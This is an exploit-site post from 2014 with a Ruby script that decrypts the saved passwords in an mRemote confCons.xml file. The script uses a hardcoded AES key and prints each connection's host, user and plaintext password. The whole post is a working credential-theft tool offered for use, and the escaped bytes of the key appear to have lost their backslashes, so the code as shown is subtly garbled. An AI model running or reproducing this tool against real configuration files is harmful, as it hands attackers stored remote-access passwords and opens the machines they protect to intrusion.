Home / exploits mRemote Offline Password Decrypt
Posted on 25 April 2014
################################################################################ # # # mRemote Offline Password Decrypt # # Based on Metasploit Module enum_mremote_pwds.rb from David Maloney # # Autor: Adriano Marcio Monteiro # # E-mail: adrianomarciomonteiro@gmail.com # # Blog: adrianomarciomonteiro.blogspot.com.br # # # # Usage: ruby mRemoteOffPwdsDecrypt.rb confCons.xml # # # ################################################################################ require 'rexml/document' require 'openssl' require 'optparse' include REXML case ARGV[0] when "confCons.xml" @secret= "xc8xa3x9dxe2xa5x47x66xa0xdax87x5fx79xaaxf1xaax8c" xmlfile = File.new(ARGV[0]) xmldoc = Document.new(xmlfile) xmldoc.elements.each("Connections/Node"){|e| host = e.attributes['Hostname'] port = e.attributes['Port'] proto = e.attributes['Protocol'] user = e.attributes['Username'] domain = e.attributes['Domain'] epassword= e.attributes['Password'] next if epassword == nil or epassword== "" decoded = epassword.unpack("m*")[0] iv= decoded.slice!(0,16) decipher = OpenSSL::Cipher::AES.new(128, :CBC) decipher.decrypt decipher.key = @secret decipher.iv = iv if iv != nil pass = decipher.update(decoded) + decipher.final print "HOST:#{host} PORT:#{port} PROTO:#{proto} USER:#{user} PASS:#{pass} " } else print "mRemote Offline Password Decrypt. " print "Based on Metasploit Module enum_mremote_pwds.rb by David Maloney " print "Author: Adriano Marcio Monteiro " print "E-mail: adrianomarciomonteiro@gmail.com " print "Blog: adrianomarciomonteiro.blogspot.com.br " print "Usage: ruby mRemoteOffPwdsDecrypt.rb confCons.xml " end
